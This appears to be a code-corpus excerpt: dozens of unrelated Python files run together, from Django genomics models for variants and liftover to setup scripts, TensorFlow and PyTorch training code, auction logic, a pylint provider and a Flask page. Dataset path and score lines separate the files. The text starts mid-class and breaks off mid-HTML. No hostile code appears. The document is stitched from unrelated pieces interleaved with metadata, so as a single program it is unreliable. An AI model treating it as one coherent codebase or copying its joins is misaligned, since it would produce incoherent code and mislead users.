return self.is_standard_variant or self.is_reference
@property
def can_have_annotation(self) -> bool:
return self.is_standard_variant
def as_tuple(self) -> VariantCoordinate:
return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq
def is_abbreviated(self):
return str(self) != self.full_string
@lazy
def full_string(self):
""" No abbreviation """
return self.format_tuple(*self.as_tuple())
def __str__(self):
return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt)
def get_absolute_url(self):
# will show allele if there is one, otherwise go to variant page
return reverse('view_allele_from_variant', kwargs={"variant_id": self.pk})
@lazy
def allele(self) -> Optional[Allele]:
va = VariantAllele.objects.filter(variant=self).first()
if va:
return va.allele
return None
@property
def equivalent_variants(self) -> Iterable['Variant']:
allele = self.allele
if not allele:
return [self]
return Variant.objects.filter(variantallele__allele=allele)
def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:
vav = genome_build.latest_variant_annotation_version
return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first()
def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:
vav = genome_build.latest_variant_annotation_version
if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first():
return can
if version := self.varianttranscriptannotation_set.filter(version=vav).first():
return version
if any_at_all := self.varianttranscriptannotation_set.first():
return any_at_all
def get_canonical_c_hgvs(self, genome_build):
c_hgvs = None
if cta := self.get_canonical_transcript_annotation(genome_build):
c_hgvs = cta.hgvs_c
return c_hgvs
@property
def start(self):
return self.locus.position
@property
def end(self):
return self.locus.position + max(self.locus.ref.length, self.alt.length)
@staticmethod
def clean_variant_fields(chrom, position, ref, alt, want_chr):
ref = ref.strip().upper()
alt = alt.strip().upper()
if Variant.is_ref_alt_reference(ref, alt):
alt = Variant.REFERENCE_ALT
chrom = format_chrom(chrom, want_chr)
return chrom, position, ref, alt
class VariantWiki(Wiki):
variant = models.OneToOneField(Variant, on_delete=CASCADE)
class VariantAllele(TimeStampedModel):
""" It's possible for multiple variants from the same genome build to
resolve to the same allele (due to our normalization not being the same as ClinGen
or 2 loci in a genome build being represented by 1 loci in the build being used
by ClinGen) - but it's not likely. It's a bug to have the same 3 variant/build/allele
so we can add that unique_together constraint
We only expect to store Alleles for a small fraction of Variants
So don't want them on the Variant object - instead do 1-to-1 """
# Some builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in those cases
# we'll have the same variant linked through different VariantAlleles (so it can't be 1-to-1)
variant = models.ForeignKey(Variant, on_delete=CASCADE)
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)
allele = models.ForeignKey(Allele, on_delete=CASCADE)
origin = models.CharField(max_length=1, choices=AlleleOrigin.choices)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
error = models.JSONField(null=True) # Only set on error
class Meta:
unique_together = ("variant", "genome_build", "allele")
@property
def canonical_c_hgvs(self):
return self.variant.get_canonical_c_hgvs(self.genome_build)
def needs_clingen_call(self):
if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None:
if self.error:
# Retry if server was down
return self.error.get("errorType") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE
return True
return False
def __str__(self):
return f"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})"
class VariantCollection(RelatedModelsPartitionModel):
""" A set of variants - usually used as a cached result """
RECORDS_BASE_TABLE_NAMES = ["snpdb_variantcollectionrecord"]
RECORDS_FK_FIELD_TO_THIS_MODEL = "variant_collection_id"
PARTITION_LABEL_TEXT = "variant_collection"
name = models.TextField(null=True)
count = models.IntegerField(null=True)
status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED)
@property
def variant_collection_alias(self):
return f"variantcollection_{self.pk}"
def get_annotation_kwargs(self):
vcr_condition = Q(variantcollectionrecord__variant_collection=self)
return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)}
def get_q(self):
if self.status != ProcessingStatus.SUCCESS:
raise ValueError(f"{self}: status {self.get_status_display()} != SUCCESS")
return Q(**{f"{self.variant_collection_alias}__isnull": False})
def __str__(self):
return f"VariantCollection: {self.pk} ({self.name})"
class VariantCollectionRecord(models.Model):
variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition
variant = models.ForeignKey(Variant, on_delete=CASCADE)
class AlleleSource(models.Model):
""" Provides a source of alleles for liftover pipelines. """
objects = InheritanceManager()
def get_genome_build(self):
return None
def get_variants_qs(self):
return Variant.objects.none()
def get_allele_qs(self):
return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs())
def liftover_complete(self, genome_build: GenomeBuild):
""" This is called at the end of a liftover pipeline (once per build) """
pass
class VariantAlleleSource(AlleleSource):
variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)
def get_genome_build(self):
return self.variant_allele.genome_build
def get_variants_qs(self):
return Variant.objects.filter(variantallele=self.variant_allele)
@staticmethod
def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']:
""" Only works if liftover was done via VariantAlleleSource """
allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele)
return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first()
class VariantAlleleCollectionSource(AlleleSource):
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)
def get_genome_build(self):
return self.genome_build
def get_variants_qs(self):
return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids())
def get_variant_allele_ids(self):
return self.variantallelecollectionrecord_set.values_list("variant_allele", flat=True)
class VariantAlleleCollectionRecord(models.Model):
collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE)
variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)
class Liftover(TimeStampedModel):
""" Liftover pipeline involves reading through a VCF where ID is set to Allele.pk and then creating
VariantAllele entries for the variant/allele
Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the desired genome build
For others (NCBI Remap) we need to write the source genome build VCF first
Alleles must have already been created - allele_source used to retrieve them
The VCF (in genome_build build) is set in UploadedFile for the UploadPipeline """
user = models.ForeignKey(User, on_delete=CASCADE)
allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
source_vcf = models.TextField(null=True)
source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE,
related_name="liftover_source_genome_build")
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination
def get_allele_source(self) -> AlleleSource:
""" Returns subclass instance """
return AlleleSource.objects.get_subclass(pk=self.allele_source_id)
def get_allele_qs(self) -> QuerySet:
return self.get_allele_source().get_allele_qs()
def complete(self):
self.get_allele_source().liftover_complete(genome_build=self.genome_build)
def __str__(self):
source = ""
if self.source_genome_build:
source = f"from {self.source_genome_build.name} "
return f"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}"
class LiftoverError(models.Model):
liftover = models.ForeignKey(Liftover, on_delete=CASCADE)
allele = models.ForeignKey(Allele, on_delete=CASCADE)
variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but invalid
error_message = models.TextField()
class Meta:
unique_together = ('liftover', 'allele')
def __str__(self):
return f"{self.allele} failed {self.liftover}: {self.error_message}"
| 1.671875 | 2 |
setup.py | KaiAnalytics/qualtrics_mailer | 6 | 12796595 | <filename>setup.py
from setuptools import setup
setup(
name='qualtrics_mailer',
version='0.1',
description='A package for distributing pre-built surveys in Qualtrics',
keywords='qualtrics survey',
url='http://github.com/kaianalytics/qualtrics_mailer',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
classifiers=[
'Programming Language :: Python :: 3.6'
],
packages=[
'qualtrics_mailer'
],
install_requires=[
'pandas',
'requests'
],
zip_safe=False
)
| 1.460938 | 1 |
models/__init__.py | respect5716/Tensorflow_Cifar10 | 0 | 12796596 | <reponame>respect5716/Tensorflow_Cifar10<gh_stars>0
import tensorflow as tf
from .vgg import *
from .resnet import *
from .resnext import *
from .preact_resnet import *
from .densenet import *
from .dpn import *
from .dla import *
from .senet import *
def create_model(model_name, initializer, weight_decay):
model_dict = {
'vgg': VGG11,
'resnet': ResNet56,
'preact_resnet': PreactResNet56,
'resnext': ResNext20_4x16d,
'densenet': DenseNet57,
'dpn': DPN32,
'senet': SENet26,
'dla': DLA,
}
regularizer = tf.keras.regularizers.l2(weight_decay)
kwargs = {
'kernel_initializer': initializer,
'kernel_regularizer': regularizer,
}
model = model_dict[model_name](**kwargs)
print(model.summary())
return model | 2.078125 | 2 |
codewars/python/Inc_dec_test.py | James992927108/practice | 0 | 12796597 | <gh_stars>0
import sys
sys.dont_write_bytecode = True
import unittest
import inc_dec
class Test_TestIncrementDecrement(unittest.TestCase):
def test_increment(self):
self.assertEquals(inc_dec.increment(3), 4)
def test_decrement(self):
self.assertEquals(inc_dec.decrement(3), 2)
if __name__ == '__main__':
unittest.main()
| 2.65625 | 3 |
understanding_loop_control.py | brucestull/PythonLearning | 2 | 12796598 | # Second edit.
# Added feature_01.
# Create two nested 'for' loops.
for x in range(1,5):
print(f"Start of x:{x} loop.")
for y in range(1,5):
print(f"Start of y:{y} loop.")
if y == 3:
print(x, y, 'breaking')
# print("Only 'break' out of inner 'y' loop.")
break
else:
print(x, y, f"continuing. AKA end of y:{y} loop." )
# print("Will this start at beginning of 'y' loop?")
continue
# Code here not reacheable since following 'if' -> 'else'.
print("Code here not reacheable since following 'if' -> 'else'.")
print("Just finished all the 'y' loops.")
print(f"Also, just finished x:{x} loop.")
print("Just finished all the 'x' loops.")
| 4.125 | 4 |
setup.py | timniven/hsdbi | 0 | 12796599 | <reponame>timniven/hsdbi<gh_stars>0
from setuptools import setup, find_packages
# python setup.py sdist upload -r pypi
setup(
name='hsdbi',
packages=find_packages(exclude=['testing']),
version='0.1a18',
description='A simple interface for accessing databases.',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/timniven/hsdbi',
download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
],
keywords='database interface facade',
install_requires=[
'pymongo',
'sqlalchemy'
]
)
| 1.234375 | 1 |
fabfile/__init__.py | doutriaux1/ocgis | 1 | 12796600 | from fabric.decorators import task
from fabric.operations import run, sudo, local
from ConfigParser import ConfigParser
import geospatial
from fabric.context_managers import lcd
cp = ConfigParser()
cp.read('ocgis.cfg')
if cp.get('install','location') == 'local':
run = local
cd = lcd
def lsudo(op):
local('sudo {0}'.format(op))
sudo = lsudo
SRC = cp.get('install','src')
INSTALL = cp.get('install','install')
J = cp.get('install','j')
@task(default=True)
def deploy():
# geospatial.install_hdf()
geospatial.install_netCDF4() | 2 | 2 |
examples/simpleApp.py | tgolsson/appJar | 666 | 12796601 | <filename>examples/simpleApp.py
# import the library
from appJar import gui
app = gui() # top slice - CREATE the GUI
app.addLabel("title", "Welcome to appJar") # add a label
app.setLabelBg("title", "red") # set the label's background to be red
app.go() # bottom slice - START the GUI
| 3.015625 | 3 |
example/simple/lib.py | viniciusfeitosa/pychecko | 5 | 12796602 | <reponame>viniciusfeitosa/pychecko
def bar(self):
self.email = '<EMAIL>'
| 1.359375 | 1 |
trainGlobalIllumination.py | YouweiLyu/SingleImageShapeAndSVBRDF | 60 | 12796603 | import torch
import numpy as np
from torch.autograd import Variable
import torch.optim as optim
import argparse
import random
import os
import models
import torchvision.utils as vutils
import utils
import dataLoader
from torch.utils.data import DataLoader
parser = argparse.ArgumentParser()
# The locationi of training set
parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images')
parser.add_argument('--experiment', default=None, help='the path to store samples and models')
# The basic training setting
parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training')
parser.add_argument('--batchSize', type=int, default=16, help='input batch size')
parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image to network')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network')
# The training weight
parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2')
parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3')
# Fine Tune the network
parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not')
parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network')
# The detail network setting
parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we use')
opt = parser.parse_args()
print(opt)
assert(opt.cascadeLevel == 0 )
if opt.experiment is None:
opt.experiment = 'check_globalillumination'
os.system('mkdir {0}'.format(opt.experiment) )
os.system('cp *.py %s' % opt.experiment )
g2W, g3W = opt.globalIllu2, opt.globalIllu3
opt.gpuId = opt.deviceIds[0]
opt.seed = random.randint(1, 10000)
print("Random Seed: ", opt.seed)
random.seed(opt.seed)
torch.manual_seed(opt.seed)
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
####################################
# initalize tensors
albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )
segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )
imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
# Global illumination
globIllu1to2 = models.globalIllumination()
globIllu2to3 = models.globalIllumination()
#########################################
if opt.isFineTune:
globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) )
globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) )
############## ######################
# Send things into GPU
if opt.cuda:
albedoBatch = albedoBatch.cuda(opt.gpuId)
normalBatch = normalBatch.cuda(opt.gpuId)
roughBatch = roughBatch.cuda(opt.gpuId)
depthBatch = depthBatch.cuda(opt.gpuId)
segBatch = segBatch.cuda(opt.gpuId)
imP1Batch = imP1Batch.cuda(opt.gpuId)
imP2Batch = imP2Batch.cuda(opt.gpuId)
imP3Batch = imP3Batch.cuda(opt.gpuId)
globIllu1to2 = globIllu1to2.cuda(opt.gpuId)
globIllu2to3 = globIllu2to3.cuda(opt.gpuId)
####################################
####################################
# Global Optimier
opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) )
opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) )
#####################################
####################################
brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize)
brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False)
j = 0
globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
for epoch in list(range(opt.epochId+1, opt.nepoch) ):
trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w')
for i, dataBatch in enumerate(brdfLoader):
j += 1
# Load data from cpu to gpu
albedo_cpu = dataBatch['albedo']
albedoBatch.data.resize_(albedo_cpu.shape)
albedoBatch.data.copy_(albedo_cpu )
normal_cpu = dataBatch['normal']
normalBatch.data.resize_(normal_cpu.shape)
normalBatch.data.copy_(normal_cpu )
rough_cpu = dataBatch['rough']
roughBatch.data.resize_(rough_cpu.shape)
roughBatch.data.copy_(rough_cpu )
seg_cpu = dataBatch['seg']
segBatch.data.resize_(seg_cpu.shape)
segBatch.data.copy_(seg_cpu )
depth_cpu = dataBatch['depth']
depthBatch.data.resize_(depth_cpu.shape)
depthBatch.data.copy_(depth_cpu )
imP1_cpu = dataBatch['imP1']
imP1Batch.data.resize_(imP1_cpu.shape)
imP1Batch.data.copy_(imP1_cpu )
imP2_cpu = dataBatch['imP2']
imP2Batch.data.resize_(imP2_cpu.shape)
imP2Batch.data.copy_(imP2_cpu )
imP3_cpu = dataBatch['imP3']
imP3Batch.data.resize_(imP3_cpu.shape)
imP3Batch.data.copy_(imP3_cpu )
opGlobalIllu1to2.zero_grad()
opGlobalIllu2to3.zero_grad()
########################################################
# Build the cascade network architecture #
globalIllu2s = []
globalIllu3s = []
n = 0
inputGlob2 = torch.cat([imP1Batch, albedoBatch,
normalBatch, roughBatch, depthBatch, segBatch], dim=1)
globalIllu2 = globIllu1to2(inputGlob2)
globalIllu2s.append(globalIllu2 )
inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch,
normalBatch, roughBatch, depthBatch, segBatch], dim=1)
globalIllu3 = globIllu2to3(inputGlob3.detach() )
globalIllu3s.append(globalIllu3)
########################################################
globalIllu2Errs = []
globalIllu3Errs = []
pixelNum = torch.sum(segBatch ).cpu().data.item()
for m in range(0, n + 1):
globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch)
* (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 )
globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch)
* (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 )
globalIllu2ErrSum = sum(globalIllu2Errs)
globalIllu3ErrSum = sum(globalIllu3Errs)
totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum
totalErr.backward()
opGlobalIllu1to2.step()
opGlobalIllu2to3.step()
# Output training error
utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j)
utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j)
utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j)
utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j)
globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0)
globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0)
if j < 1000:
utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
else:
utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
if j == 1 or j == 1000 or j% 2000 == 0:
# Save the ground truth and the input
vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data,
'{0}/{1}_albedoGt.png'.format(opt.experiment, j) )
vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data,
'{0}/{1}_normalGt.png'.format(opt.experiment, j) )
vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data,
'{0}/{1}_roughGt.png'.format(opt.experiment, j) )
depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch)
depthOut = (depthOut - 0.25) /0.8
vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data,
'{0}/{1}_depthGt.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP1.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP2.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP3.png'.format(opt.experiment, j) )
# Save the predicted results
for n in range(0, opt.cascadeLevel + 1):
vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data,
'{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) )
vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data,
'{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) )
trainingLog.close()
# Update the training rate
if (epoch + 1) % 2 == 0:
for param_group in opGlobalIllu1to2.param_groups:
param_group['lr'] /= 2
for param_group in opGlobalIllu2to3.param_groups:
param_group['lr'] /= 2
np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList )
np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList )
torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) )
torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment, epoch) )
| 2.3125 | 2 |
examples/plot_read_raw_data.py | arokem/mne-python | 0 | 12796604 | """
==========================
Reading a raw file segment
==========================
"""
# Author: <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
print __doc__
import os
from mne import fiff
fname = os.environ['MNE_SAMPLE_DATASET_PATH']
fname += '/MEG/sample/sample_audvis_raw.fif'
raw = fiff.setup_read_raw(fname)
exclude = ['MEG 2443', 'EEG 053'] # bad channels
meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude)
meg_channels_idx = meg_channels_idx[:5] # take 5 first
start, stop = raw.time_to_index(100, 115) # 100 s to 115 s data segment
data, times = raw[meg_channels_idx, start:stop]
# data, times = raw[:, start:stop] # read all channels
raw.close()
###############################################################################
# Show MEG data
import pylab as pl
pl.close('all')
pl.plot(times, data.T)
pl.xlabel('time (s)')
pl.ylabel('MEG data (T)')
pl.show()
| 2.53125 | 3 |
openprocurement/auctions/geb/managers/changers/actions/cancellations.py | andrey484/openprocurement.auctions.geb | 0 | 12796605 | from openprocurement.auctions.core.utils import (
log_auction_status_change
)
from openprocurement.auctions.geb.constants import (
AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION
)
from openprocurement.auctions.geb.managers.changers.base import (
BaseAction
)
class CancellationActivationAction(BaseAction):
"""
Cancellation Activation action
when auction owner activate cancellation (patch status to 'active'):
- auction.status will set to 'cancelled'
- if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction']
delete all bids
"""
validators = []
@classmethod
def demand(cls, request, context):
"""
Constructor method. If it is reason of action
this method return instance of Action
"""
# check if patch is for activating cancellation
new_status = request.validated['json_data'].get('status')
if context.status == 'pending' and new_status == 'active':
return cls
return False
def act(self):
auction = self.request.auction
# pendify auction status
status = 'cancelled'
auction.status = status
log_auction_status_change(self.request, self.context, status)
# clean bids after cancellation procedure
auction_status = self.request.validated['auction_src']['status']
if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION:
auction.bids = []
| 2.390625 | 2 |
tool_test/test_v_output4_8_get_map_zip_data.py | BerkeleyLibrary/geodata_pre_ingest | 0 | 12796606 | <reponame>BerkeleyLibrary/geodata_pre_ingest<filename>tool_test/test_v_output4_8_get_map_zip_data.py
#!/usr/bin/python
import os
import sys
import shutil
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from pre_ingestion import zip_data,geo_helper,par,validate_csv
dirname = os.path.dirname(__file__).replace("test","test_data")
def main():
try:
geo_ext_list = _EXT = [".cpg",
".dbf",
".prj",
".sbn",
".sbx",
".shp",
".shx"]
process_path = os.path.join(dirname,"vector_data","vector_output")
valid_updated_csv = validate_csv.ValidateCSV(process_path)
if valid_updated_csv.work_files_existed():
workspace_batch_path = geo_helper.GeoHelper.work_path(process_path)
projected_map_path = geo_helper.GeoHelper.map_download_path(process_path)
z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,"map.zip",geo_ext_list)
z_data.map_zipfiles()
except Exception, e:
txt = "Code exception: {0} ; {1}".format(__file__,str(e))
geo_helper.GeoHelper.arcgis_message(txt)
if __name__ == '__main__':
main()
| 2.140625 | 2 |
src/archan_pylint/__init__.py | Pawamoy/archan-pylint | 1 | 12796607 | import sys
try:
from archan import Provider, Argument, DomainMappingMatrix, Logger
from pylint.lint import Run
class LoggerWriter:
def __init__(self, level):
self.level = level
def write(self, message):
if message != '\n':
self.level('from pylint: ' + message)
class PylintProvider(Provider):
"""Pylint provider for Archan."""
identifier = 'archan_pylint.PylintProvider'
name = 'Pylint Provider: Issues per Module'
description = 'Number of Pylint messages per module.'
argument_list = (
Argument('pylint_args', list, 'Pylint arguments as a list.'),
)
def get_data(self, pylint_args=None):
"""
Provide matrix data for Pylint messages in a set of packages.
Args:
pylint_args (list): the arguments to pass to Pylint.
depth (int): the depth of the matrix to generate.
Returns:
archan.DSM: instance of archan DSM.
"""
logger = Logger.get_logger(__name__)
pylint_args = pylint_args or []
sys.stdout = LoggerWriter(logger.debug)
sys.stderr = LoggerWriter(logger.warning)
try:
run = Run(pylint_args, do_exit=False)
except TypeError:
run = Run(pylint_args, exit=False)
sys.stdout = sys.__stdout__
sys.sterr = sys.__stderr__
entities = []
data = []
for k, v in run.linter.stats['by_module'].items():
entities.append(k)
data.append([sum(v.values())])
entities.append('Messages')
return DomainMappingMatrix(data=data, entities=entities)
except ImportError:
class PyLintProvider:
"""Empty provider, please install Archan and Pylint."""
| 2.40625 | 2 |
example_snippets/multimenus_snippets/NewSnippets/SymPy/Functions/Combinatorial functions/Stirling number of the second kind.py | kuanpern/jupyterlab-snippets-multimenus | 0 | 12796608 | stirling(n, k) | 0.96875 | 1 |
openapi_core/schema/contacts/models.py | eyadgaran/openapi-core | 0 | 12796609 | <gh_stars>0
"""OpenAPI core contacts models module"""
class Contact(object):
def __init__(self, name=None, url=None, email=None, extensions=None):
self.name = name
self.url = url
self.email = email
self.extensions = extensions and dict(extensions) or {}
| 1.984375 | 2 |
codebasin/walkers/tree_walker.py | jasonsewall-intel/code-base-investigator | 17 | 12796610 | # Copyright (C) 2019 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
import logging
import collections
log = logging.getLogger('codebasin')
class TreeWalker():
"""
Generic tree walker class.
"""
def __init__(self, _tree, _node_associations):
self.tree = _tree
self._node_associations = _node_associations
| 2.21875 | 2 |
daiquiri/files/migrations/0002_depth.py | agy-why/daiquiri | 14 | 12796611 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-09 14:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('daiquiri_files', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='directory',
name='depth',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='directory',
name='path',
field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256, verbose_name='Path'),
),
]
| 1.570313 | 2 |
webserver.py | Linerly/linerlybot-rewritten | 3 | 12796612 | <reponame>Linerly/linerlybot-rewritten
from threading import Thread
from flask import Flask
app = Flask("")
@app.route("/")
def home():
return """
<!DOCTYPE="html">
<html>
<head>
<link rel="icon" href="https://linerly.github.io/assets/linerlybot/linerlybot.png" type="image/png">
<title>LinerlyBot Repl Page</title>
</head>
<body style="width: 80%; margin: auto;">
<style>
figure message {
top: 0;
left: 0;
position: absolute;
}
</style>
<style>
#message {
margin: 0;
padding: 12px 15px;
background-color: #1e90ff;
color: #fff;
text-align: center;
font-family: sans-serif;
font-size: 13px;
}
</style>
<p id="message">You're in LinerlyBot's Replit site. <a href="https://linerly.github.io/linerlybot">Click here to go to LinerlyBot's main page!</a></p>
<br>
<img alt="LinerlyBot logo" src="https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png" style="display: block; margin-left: auto; margin-right: auto; border-radius: 50%;" width="128" height="128">
<h2 align="center">linerlybot-rewritten</h2>
<p align="center">
<a href="https://discord.gg/a9Sy7gE"><img alt="Discord Server" src="https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat"></a>
<a href="https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE"><img alt="License" src="https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat"></a>
